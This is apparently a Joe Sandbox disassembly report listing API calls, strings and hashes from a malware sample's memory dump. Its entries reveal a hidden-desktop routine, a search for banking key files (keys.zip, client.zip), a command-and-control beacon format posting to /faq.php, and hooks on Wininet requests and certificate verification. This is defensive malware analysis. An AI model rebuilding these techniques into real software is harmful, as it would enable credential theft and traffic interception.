                                                                                                                                                                                                              • Instruction ID: 9ec9e8ece222483fe9e3fac88e6393d50092ed6275d2b0e6827c4d6a1f71b29b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b704a4a710b00d31fee7d81c8b50712889c96b69eac4fa8b853af867c046acf3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2A2DC74A91318BEFB20AB94CC4AFEE7B78EF45B05F504149F600BA1C0D7F46A458B69
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 012ED35F
                                                                                                                                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 012ED36A
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 012ED37D
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 012ED392
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EB), ref: 012ED3A1
                                                                                                                                                                                                              • SetWindowTextA.USER32(?,-00000008), ref: 012ED3AD
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 012ED3BC
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 012ED3C7
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 012ED3DA
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 012ED418
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 012ED428
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 012ED437
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 012ED44F
                                                                                                                                                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 012ED459
                                                                                                                                                                                                              • CreateFontIndirectA.GDI32 ref: 012ED46F
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 012ED47F
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001), ref: 012ED4B7
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012ED4BA
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 012ED4CE
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 012ED533
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 012ED55D
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 012ED569
                                                                                                                                                                                                              • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 012ED585
                                                                                                                                                                                                              • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 012ED5AA
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F4,?), ref: 012ED5BC
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 012ED5C5
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 012ED5D4
                                                                                                                                                                                                              • GetWindowTextLengthA.USER32(00000000), ref: 012ED5DB
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 012ED5EF
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 012ED613
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 012ED620
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 012ED630
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000DE), ref: 012ED64C
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000F2), ref: 012ED655
                                                                                                                                                                                                              • LoadIconA.USER32(00000000,00007F00), ref: 012ED661
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 012ED67B
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 012ED6A4
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 012ED6B3
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 012ED6C6
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 012ED6E9
                                                                                                                                                                                                              • IsIconic.USER32(?), ref: 012ED707
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001), ref: 012ED714
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012ED723
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012ED73B
                                                                                                                                                                                                                • Part of subcall function 012ED2B0: GetWindowThreadProcessId.USER32(?,00000000), ref: 012ED2BC
                                                                                                                                                                                                                • Part of subcall function 012ED2B0: GetCurrentThreadId.KERNEL32 ref: 012ED2C4
                                                                                                                                                                                                                • Part of subcall function 012ED2B0: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 012ED2D0
                                                                                                                                                                                                                • Part of subcall function 012ED2B0: SendMessageA.USER32(?,0000000D,?,?), ref: 012ED2E1
                                                                                                                                                                                                                • Part of subcall function 012ED2B0: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 012ED2ED
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 012ED748
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?,000000EB), ref: 012ED7B7
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000), ref: 012ED7BE
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012ED7CE
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012ED7E8
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000000), ref: 012ED7FD
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EB), ref: 012ED80C
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 012ED818
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 012ED827
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 012ED82E
                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 012ED843
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                              • String ID: '$<$P0Mw$static
                                                                                                                                                                                                              • API String ID: 2592195760-98485823
                                                                                                                                                                                                              • Opcode ID: 89fb34e8fa0de185e023d977082ffff5238de943ee3e141a7b670eb3e4e72ed1
                                                                                                                                                                                                              • Instruction ID: 72f65e81bfa0df118a64db226a3297ad13c4167ce664bb2ba02e6f0d1d07f416
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89fb34e8fa0de185e023d977082ffff5238de943ee3e141a7b670eb3e4e72ed1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21E19271214305AFD734AFA8EC88FAA77BCEB89722F60461CF615E72C8C77495418B61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 01304F20: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000101,?), ref: 01304F50
                                                                                                                                                                                                                • Part of subcall function 01304F20: GetProcessHeap.KERNEL32(00000008,00000110), ref: 01304F69
                                                                                                                                                                                                                • Part of subcall function 01304F20: HeapAlloc.KERNEL32(00000000), ref: 01304F6C
                                                                                                                                                                                                                • Part of subcall function 01304F20: memset.MSVCRT(00000000,00000000,00000110), ref: 01304F80
                                                                                                                                                                                                                • Part of subcall function 01304F20: RegQueryValueExA.ADVAPI32(?,Shell,00000000,00000001,00000000,00000104), ref: 01304FA0
                                                                                                                                                                                                                • Part of subcall function 01304F20: RegCloseKey.ADVAPI32(?), ref: 01304FB0
                                                                                                                                                                                                                • Part of subcall function 01304F20: GetProcessHeap.KERNEL32(00000000,00000000), ref: 01304FC1
                                                                                                                                                                                                                • Part of subcall function 01304F20: HeapValidate.KERNEL32(00000000), ref: 01304FC4
                                                                                                                                                                                                                • Part of subcall function 01304F20: GetProcessHeap.KERNEL32(00000000,00000000), ref: 01304FD1
                                                                                                                                                                                                                • Part of subcall function 01304F20: HeapFree.KERNEL32(00000000), ref: 01304FD4
                                                                                                                                                                                                              • CreateDesktopA.USER32 ref: 012E960F
                                                                                                                                                                                                              • SetThreadDesktop.USER32(00000000), ref: 012E962A
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000040), ref: 012E9638
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32 ref: 012E9670
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,00000000), ref: 012E9692
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 012E96B1
                                                                                                                                                                                                              • GetShellWindow.USER32 ref: 012E96BD
                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 012E96D2
                                                                                                                                                                                                              • GetShellWindow.USER32 ref: 012E96D4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,000000FF), ref: 012E9701
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012E9713
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,000000FF), ref: 012E972D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012E973F
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 012E9745
                                                                                                                                                                                                              • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 012E9756
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 012E97EE
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000040), ref: 012E97FF
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32 ref: 012E983D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,00000000), ref: 012E985F
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 012E9881
                                                                                                                                                                                                              • GetShellWindow.USER32 ref: 012E988D
                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 012E98A2
                                                                                                                                                                                                              • GetShellWindow.USER32 ref: 012E98A4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000024), ref: 012E98D3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012E98E1
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000024), ref: 012E98FB
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012E9909
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 012E990F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Window$Heap$CloseDesktopProcess$InformationPathShell$Creatememset$AppendFolderSleepThread$AllocFindFreeOpenQueryValidateValue
                                                                                                                                                                                                              • String ID: 9e2b3b2da$D$D$Shell_TrayWnd$explorer.exe
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 01302BCE
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,00000103), ref: 01302BE8
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 01302C12
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 01302C37
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 01302C77
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01302C81
                                                                                                                                                                                                              • #680.SHELL32 ref: 01302C89
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 01302C9A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01302CA1
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 01302CE4
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000), ref: 01302D30
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435,00000000,00000000), ref: 01302D77
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorFileLastmemset$#680AttributesCreateCurrentFolderMakeModuleNameSystem
                                                                                                                                                                                                              • String ID: 61C5C435$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E3ACA
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 012E3B33
                                                                                                                                                                                                              • SymSetOptions.DBGHELP(00000006), ref: 012E3B48
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000001), ref: 012E3B58
                                                                                                                                                                                                              • SymInitialize.DBGHELP(00000000), ref: 012E3B5B
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 012E3B9A
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 012E3C27
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00001000,ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X,?,00000000), ref: 012E3C47
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32(00000009,?,00000004,?), ref: 012E3CD4
                                                                                                                                                                                                              • ZwQueryInformationThread.NTDLL(00000000), ref: 012E3CDB
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 012E3D20
                                                                                                                                                                                                                • Part of subcall function 01305460: VirtualQuery.KERNEL32(01305460,?,?,?,?,?,012E3BC8), ref: 01305488
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ThreadStart = , xrefs: 012E3CF8
                                                                                                                                                                                                              • dd;MMM;yyyy, xrefs: 012E3E8B
                                                                                                                                                                                                              • Self exception = TRUE, xrefs: 012E3C8D
                                                                                                                                                                                                              • sysinfo.log, xrefs: 012E3F78
                                                                                                                                                                                                              • scr.bmp, xrefs: 012E3FF8
                                                                                                                                                                                                              • HH;mm;ss, xrefs: 012E3EB2
                                                                                                                                                                                                              • main, xrefs: 012E3BEE
                                                                                                                                                                                                              • ExceptionAddress = , xrefs: 012E3B68
                                                                                                                                                                                                              • debug_%s_%s.log, xrefs: 012E3ED4
                                                                                                                                                                                                              • ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 012E3C3E
                                                                                                                                                                                                              • DEBUG, xrefs: 012E404D
                                                                                                                                                                                                              • csm, xrefs: 012E3A45
                                                                                                                                                                                                              • CallStack:, xrefs: 012E3D58
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Current$ProcessQueryVirtual$Thread$AllocErrorInformationInitializeLastOptions_snprintf
                                                                                                                                                                                                              • String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 012FD13F
                                                                                                                                                                                                              • memset.MSVCRT ref: 012FD161
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?,?,00000000,0000040C,00000103,?,775B7390), ref: 012FD176
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 012FD18F
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 012FD1D8
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 012FD1EB
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 012FD24D
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 012FD563
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DriveErrorModememset$CurrentDirectoryFileFindFirstLogicalStringsType
                                                                                                                                                                                                              • String ID: *.00*$.txt$.zip$61C5C0CB$asus$found.$keys$path
                                                                                                                                                                                                              • API String ID: 989413159-176303379
                                                                                                                                                                                                              • Opcode ID: d0550ab75098afaab54ce17bc0b7a4bba32b3d68083dce7a651c8a7a830380e9
                                                                                                                                                                                                              • Instruction ID: d23014b2e8c50426afd2be6d46e01b9da6f48567ffe556dcacd8772739b541c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0550ab75098afaab54ce17bc0b7a4bba32b3d68083dce7a651c8a7a830380e9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DC1A3711083468FC726DF789468AABBBE9EF89305F14856DFA85C7241EB70D508CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(7707BCB0,774D30D0,7707BCB0,774D3050), ref: 012ECE1A
                                                                                                                                                                                                              • IsIconic.USER32(7707BCB0), ref: 012ECE25
                                                                                                                                                                                                              • GetWindowInfo.USER32(?,?,774D30D0,7707BCB0,774D3050), ref: 012ECE82
                                                                                                                                                                                                              • GetAncestor.USER32(7707BCB0,00000003), ref: 012ECEA7
                                                                                                                                                                                                              • GetWindow.USER32(?,00000003), ref: 012ECF20
                                                                                                                                                                                                              • IsWindow.USER32(7707BCB0), ref: 012ECF48
                                                                                                                                                                                                              • IsIconic.USER32(7707BCB0), ref: 012ECF53
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000038), ref: 012ECF82
                                                                                                                                                                                                              • GetWindow.USER32(7707BCB0,00000005,00000001,00000000,7707BCB0), ref: 012ECFA6
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012ECFA9
                                                                                                                                                                                                                • Part of subcall function 012EDCE0: GetClassNameA.USER32(?,?,00000101), ref: 012EDCF6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Iconic$AncestorClassInfoNamememset
                                                                                                                                                                                                              • String ID: <$<
                                                                                                                                                                                                              • API String ID: 3351429209-213342407
                                                                                                                                                                                                              • Opcode ID: e14a334bdd0783c2d97d13d80733d55bf561b676515e68a58a402900de09f324
                                                                                                                                                                                                              • Instruction ID: 312d5a1b6f4a97fc4d810fc590f2afc9c2ee5e517efdc9688dafd39ae494ae5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e14a334bdd0783c2d97d13d80733d55bf561b676515e68a58a402900de09f324
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87D19271D2021A9BEB31EFE8D848BEEBBF8BF04710F544159E615A3285D7709A51CFA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000A8), ref: 012F6991
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-000000F0), ref: 012F69C7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F69CE
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,-000000F0), ref: 012F69E3
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(00000000), ref: 012F69F2
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 012F6A06
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F6A2C
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 012F6A6A
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,?,id=%s&ver=4.1.2&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d,?,00000000,?,01329AFC,01329AF8,?,00000000), ref: 012F6AA6
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 012F6ABB
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 012F6AD3
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012F6AE2
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012F6AEF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F6B64
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F6B67
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F6B74
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F6B77
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000001,/faq.php,?,00000001,?,013296FC,00000001,00000000,00000000,/faq.php,?,00000001), ref: 012F6BED
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F6BF0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F6BFD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F6C00
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,?,00000001,00000000), ref: 012F6C0F
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012F6C1C
                                                                                                                                                                                                              • Sleep.KERNEL32(?,00000001,/faq.php,?,00000001,?,013296FC,00000001,00000000,00000000,/faq.php,?,00000001,?,013296FC,00000001), ref: 012F6C61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileProcess$AttributesDeleteFreeSleepTempValidatememset$#680AllocCountInformationNamePathTickTimeZone_snprintf
                                                                                                                                                                                                              • String ID: %2b$/faq.php$id=%s&ver=4.1.2&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
                                                                                                                                                                                                              • API String ID: 1472505117-4291654836
                                                                                                                                                                                                              • Opcode ID: d163968000e7662ba54135d8c86670251ac1e6d6ebc05c1dbb437a536e0cc066
                                                                                                                                                                                                              • Instruction ID: f10eff687594d885f0c468df9f3f4e45015b0e8e855648e18afa7139ec2de22b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d163968000e7662ba54135d8c86670251ac1e6d6ebc05c1dbb437a536e0cc066
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F481BC71A5021AABDB35AF74CD49FEABB7CEB44704F044168FB05E71C4EA709A05CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,774CF550,00000000), ref: 012F11AE
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 012F11C4
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000006,00000040,?,774D1620), ref: 012F11DC
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 012F11FE
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 012F120A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 012F1220
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 012F123C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 012F1258
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 012F1274
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 012F1290
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 012F12AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 012F12C8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 012F12E4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 012F1300
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
